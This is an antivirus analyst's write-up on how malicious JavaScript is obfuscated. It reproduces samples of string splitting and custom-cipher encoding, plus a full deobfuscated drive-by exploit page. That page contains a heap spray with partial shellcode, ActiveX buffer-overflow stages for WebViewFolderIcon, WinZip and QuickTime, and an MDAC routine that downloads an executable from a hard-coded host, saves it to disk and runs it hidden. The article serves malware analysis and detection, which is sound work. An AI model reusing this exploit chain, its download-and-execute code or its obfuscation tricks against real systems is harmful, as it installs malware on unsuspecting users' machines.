Obfuscation methods in malicious JavaScript
From Total Malware Info
Author: Alexander Adamov, Virus Analyst.
When exploiting web browser vulnerabilities, attackers make an effort to hide the malicious code by means of different kinds of obfuscation in order to evade simple signatures. The resulting script is used to download other malware onto the system.
The following methods are used to mask the malicious intent:
- HTML encryption tools
- strings splitting
- advanced protectors
As for the first, various encryption tools are widely available on the Web (e.g. http://www.iwebtool.com/html_encrypter):
An example of string splitting is shown below (Exploit.HTML.IESlice.p, as detected by Kaspersky Anti-Virus):
// Excerpt from the sample. Every API name and ProgID is assembled from
// fragments joined with `p`, which is defined outside this excerpt (the
// fragments only read as intended if `p` is an empty string — assumption).
// `anwnuo` and `izthzbn` are also defined elsewhere in the sample.
// Signatures that match on whole ProgIDs miss this; constant-folding the
// string concatenations before matching recovers the original names.
kyjkidk = "G"+p+"E"+p+"T";
// Hard-coded download URL (indicator of compromise).
var neuh = "http://masiv.info/index.php?a=3&c=3";
txnrlaa = "X"+p+"MLHTT"+p+"P";
var byzqpd = anwnuo.CreateObject("Scripting."+p+"File"+p+"SystemObject", "")
xkb = "She"+p+"ll";
sdk = "AD"+p+"O"+p+"DB";
// Name of the file dropped on disk.
xlnpl = "kfhnbue"+".exe";
wxjxlg = ".";
drogq = "G"+p+"ET";
fzsadl = "A"+p+"pp"+p+"l"+p+"ica"+p+"t"+p+"i"+p+"o"+p+"n";
ioqdw = ".";
fvmdf = "S"+p+"tre"+p+"a"+p+"m";
bhardg = "MSX"+p+"ML2";
// xkb+wxjxlg+fzsadl folds to "Shell.Application".
var lldwnqj = izthzbn(anwnuo, xkb+wxjxlg+fzsadl);
wsuvvey = "M"+p+"ic"+p+"ro"+p+"s"+p+"oft";
// A numeric constant split into a sum (evaluates to 27).
cxawh = 7+6+1+1+3+6+2+1;
nvueig = "G"+p+"ET";
ujzsd = "X"+p+"ML"+p+"HTTP";
// sdk+ioqdw+fvmdf folds to "ADODB.Stream".
var ulgaiur = izthzbn(anwnuo, sdk+ioqdw+fvmdf);
evu = "MSXML"+p+"2";
But the most interesting case is when the code is obfuscated by custom encryption routines. Let us consider the code of Exploit.HTML.IESlice.h (detected by Kaspersky Anti-Virus):
// First stage: document.write() emits a <script> block that is entirely
// URL-escaped. Decoded, it defines zX(s): the last character of s is a
// numeric shift key, the remainder is unescape()d, every character code is
// lowered by the key, and the result is unescape()d once more and written
// into the page. (The literal is shown wrapped across lines in this listing;
// in the sample it is one string.)
document.write( unescape('%3C%73%63%72%69%70%74%3E
%0D%0A%66%75%6E%63%74%69%6F%6E%20%7A%58%28
%73%29%0D%0A%7B%0D%0A%76%61%72%20%73%31%3D
%75%6E%65%73%63%61%70%65%28%20%73%2E%73%75
%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74
%68%2D%31%29%29%3B%20%0D%0A%76%61%72%20%74
%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C
%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29
%20%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F
%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63
%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73
%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67
%74%68%2D%31%2C%31%29%29%3B%20%0D%0A%64%6F
%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75
%6E%65%73%63%61%70%65%28%74%29%29%3B%20%7D
%0D%0A%3C%2F%73%63%72%69%70%74%3E'));
// Second stage: the real payload passed through zX. The argument is
// truncated ("…") in this listing, so the trailing key character is not
// visible; the leading bytes decode to "<script language" with a shift of 5.
zX('%2A8Hxhwnuy%2A75qfslzflj%2A8IOf%7BfXhwnuy%2A8Jkzshynts
%2A75ih%2A7%3D%7D%2A7%3E%2A%3CG%7Bfw%2A75q%2A8I…');
Here we can see the unescape('%3C%73%63%72%69…') call, which emits the body of the zX function that performs the decoding: the last character of its argument is a numeric key, and each character of the unescaped argument is shifted down by that key before the result is unescaped again and written with document.write. After it comes the corresponding zX(...) call, which extracts the real script content:
<html>
<head>
<title></title>
<script language="JavaScript">
// Global state shared by the spray routine: `memory` receives the sprayed
// heap blocks in makeSlide(), and `mem_flag` records that makeSlide() has
// already run so the exploit stages do not spray twice.
var memory = new Array();
var mem_flag = 0;
// Re-schedules itself every 2 s. The self-assignment is a no-op, so the only
// effect is a live timer whose callback keeps referencing `memory`
// (presumably to keep the sprayed blocks alive — not verifiable from here).
function having() { memory=memory; setTimeout("having()", 2000); }
// Doubles `spraySlide` until it spans at least half of `spraySlideSize`
// (sizes are in bytes and JS strings are UTF-16, hence the *2), then trims it
// to exactly spraySlideSize/2 code units, i.e. spraySlideSize bytes.
// Returns the filler string that makeSlide() prepends to the shellcode.
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{spraySlide += spraySlide;}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
// Classic heap spray: fills `memory` with 4 MiB (0x400000) blocks, each a run
// of 0x0c0c filler followed by the shellcode, so that the 0x0c0c0c0c value the
// exploit stages write lands inside one of them. The `"..."` appended to
// payLoadCode is the author's truncation of the shellcode in this listing;
// the sample's full `%u` string is the payload analysed after the listing.
// The fixed constants (0x0c0c0c0c, 0x400000, the `%u` literal) are the usual
// detection points for this pattern.
function makeSlide()
{
// Address the exploit stages steer execution to (see the 0x0c0c0c0c
// constants in startWVF() and startWinZip()).
var heapSprayToAddress = 0x0c0c0c0c;
var payLoadCode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" + "...");
var heapBlockSize = 0x400000;
// Byte size; JS strings are UTF-16, hence the *2.
var payLoadSize = payLoadCode.length * 2;
// 0x38 presumably leaves room for the string object's header so each block
// stays within heapBlockSize — assumption, not verifiable from the script.
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
// Implicit global. (0x0c0c0c0c - 0x400000) / 0x400000 ≈ 47.2, so the loop
// below runs 48 times.
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
// Mark the spray as done and start the keep-alive timer.
mem_flag = 1;
having();
return memory;
}
// WebViewFolderIcon stage (the setSlice() vulnerability listed after the
// code). The ProgID is split into fragments to evade plain string matching.
// Up to 128 attempts; every exception, including the one raised when the
// control is disabled or absent, is swallowed so the loop just continues.
function startWVF()
{
for (i=0;i<128;i++)
{
try{
var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
// Implicit globals; `b` is the sprayed address from makeSlide().
d = 0x7ffffffe;
b = 0x0c0c0c0c
tar.setSlice(d, b, b, b );
}catch(e){}
}
}
// WinZip FileView stage (CreateNewFolderFromName() overflow listed after the
// code). Builds a 231-byte run of 'A' followed by seven 0x0c bytes — the same
// byte value as the spray address — and passes it to the control obtained in
// startOverflow(). No try/catch here; the caller's catch swallows failures.
function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}
// Exploit state machine driven by `num` (0 -> 1 -> 2), with a 2 s pause
// between stages via setTimeout(). Every stage swallows all exceptions, so a
// missing or disabled control simply falls through to the next stage.
function startOverflow(num)
{
if (num == 0) {
// Stage 0: Apple QuickTime. Probes for the ActiveX control, sprays the heap
// if not done yet, then injects an <object> whose "src" is the relative URL
// "qt.php" (fetched from the serving site) into #mydiv.
try {
var qt = new ActiveXObject('QuickTime.QuickTime');
if (qt) {
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="qt.php">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) makeSlide();
document.getElementById('mydiv').innerHTML = qthtml;
num = 255;
}
} catch(e) { }
// NOTE: `num = 255` is an assignment, not a comparison, so the condition is
// always true: the next stage is always scheduled with the delay and the
// `else` branch is dead code (the same applies to the stage-1 check below).
if (num = 255) setTimeout("startOverflow(1)", 2000);
else startOverflow(1);
} else if (num == 1) {
// Stage 1: WinZip FileView control, instantiated by CLSID through an
// <object> element. CreateNewFolderFromName("\0") serves as a presence
// probe; a `false` result leads to the overflow attempt in startWinZip().
try {
var winzip = document.createElement("object");
winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904");
var ret=winzip.CreateNewFolderFromName(unescape("%00"));
if (ret == false) {
if (! mem_flag) makeSlide();
startWinZip(winzip);
num = 255;
}
} catch(e) { }
if (num = 255) setTimeout("startOverflow(2)", 2000);
else startOverflow(2);
} else if (num == 2) {
// Stage 2: WebViewFolderIcon. Presence check via the split-string ProgID,
// then the setSlice() loop in startWVF().
try {
var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
if (tar) {
if (! mem_flag) makeSlide();
startWVF();
}
} catch(e) { }
}
}
// Returns a random lowercase string of length `len`, used by MDAC() to build
// the dropped file name. The alphabet omits 'j' (a quirk that can serve as a
// fingerprint of this generator); Math.random() is sufficient for the sample's
// purpose of avoiding name collisions.
function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}
return randomstring;
}
// Tries six call signatures of CreateObject()/GetObject() on the <object>
// element `CLSID` to obtain a COM object for ProgID `name`, swallowing every
// failure. Returns the first non-null result, or null if none worked.
// The eval() wrappers add nothing functionally — the same calls could be made
// directly — and are presumably there to keep the method-call text out of a
// static pattern (assumption).
function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}
// Synchronous GET of `url` through the XMLHTTP object `xml` (third argument
// false = blocking). Returns the raw responseBody, or 0 if the request threw.
function XMLHttpDownload(xml, url) {
try {
xml.open("GET", url, false);
xml.send(null);
} catch(e) { return 0; }
return xml.responseBody;
}
// Writes `data` to the file `name` through the ADODB.Stream object `o`
// (the function name misspells ADODB). Type 1 = adTypeBinary, Mode 3 =
// adModeReadWrite, SaveToFile option 2 = adSaveCreateOverWrite, so an existing
// file is replaced. Returns 1 on success, 0 if any step threw.
function ADOBDStreamSave(o, name, data) {
try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }
return 1;
}
// Launches the dropped file `name`. type 0: WScript.Shell Run() with window
// style 0 (hidden). Otherwise the Shell.Application path — but it references
// `exe`, not the parameter `exec`, so it always throws a ReferenceError that
// the catch swallows: the Shell.Application fallback (n=1 in MDAC()) can never
// succeed. Returns 1 on success, 0 otherwise.
function ShellExecute(exec, name, type) {
if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}
return(0);
}
// Download-and-execute chain that needs no memory corruption: obtain
// XMLHTTP, ADODB.Stream and a shell object through an <object> host, fetch an
// executable, save it under c:\sys<4 random letters>.exe and run it.
// Returns 1 if the file was downloaded, saved and launched, else 0.
// The hard-coded download URL below is the sample's indicator of compromise.
function MDAC() {
// CLSIDs tried as the <object> host, terminated by a null sentinel. The
// function name suggests MDAC-related controls, but the list is not
// annotated in the sample.
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}',
'{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
'{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}',
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}',
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
'{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}',
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
// v[0]: XMLHTTP, v[1]: ADODB.Stream, v[2]: shell object. n=1 marks the
// Shell.Application variant for ShellExecute().
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://listcom.org/forum/file.php';
// Walk the CLSID list until all three helpers have been obtained or the
// sentinel is reached.
while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;
try {
a = document.createElement("object");
// substring(1, length-1) strips the surrounding braces from the GUID.
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }
if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
}
if (! v[1]) {
v[1] = CreateObject(a, "ADODB.Stream");
}
if (! v[2]) {
v[2] = CreateObject(a, "WScript.Shell");
if (! v[2]) {
v[2] = CreateObject(a, "Shell.Application");
if (v[2]) n=1;
}
}
}
i++;
}
// Fetch -> write to disk -> launch. Each helper returns 0 on failure, which
// leaves `ret` at 0 and lets start() fall back to the exploit stages.
if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (ADOBDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}
return ret;
}
// Entry point, invoked from <body onload>. Tries the scriptable
// download-and-execute path first and only falls back to the memory-corruption
// stages (startOverflow(0)) when MDAC() reports failure.
function start() {
if (! MDAC() ) { startOverflow(0); }
}
</script>
</head>
<body onload="start()">
<div id="mydiv"></div>
</body>
</html>
This script exploits one of the following vulnerabilities to trigger a buffer overflow:
- Buffer overflow in the setSlice() method of the WebViewFolderIcon ActiveX object (MS06-057)
- Integer overflow in Apple QuickTime (CVE-2004-0431)
- WinZip FileView ActiveX controls CreateNewFolderFromName() Method Buffer Overflow (MS06-067)
Beforehand, the script sprays the heap with shellcode that has file-download functionality, given here in Unicode escape format:
“%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa %ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb...”
To prove the malicious intent of the shellcode it is necessary to convert it to binary form. For that purpose the following steps have to be performed:
- Remove the %u prefixes
- Swap the high and low bytes of each Unicode word (the %u notation is little-endian)
- Convert the hex text into raw bytes
- Store the result in a binary file
Let us take a look at the binary code in a disassembler:
Obviously the code is XOR-encoded. To decode it, each byte starting from offset :00000015 has to be XORed with the value 0EFh.
Now it is possible to say that this code downloads the following URL with the help of URLMON.DLL function calls: http://***.org/forum/file.php (at the time of writing, this link was not working).
To sum up, despite the wide variety of malicious code, it is possible to cope with the growing rate of attacks through existing vulnerabilities in installed software by using anti-virus solutions with a web-stream scanning feature and by disabling the execution of dangerous content in the web browser.








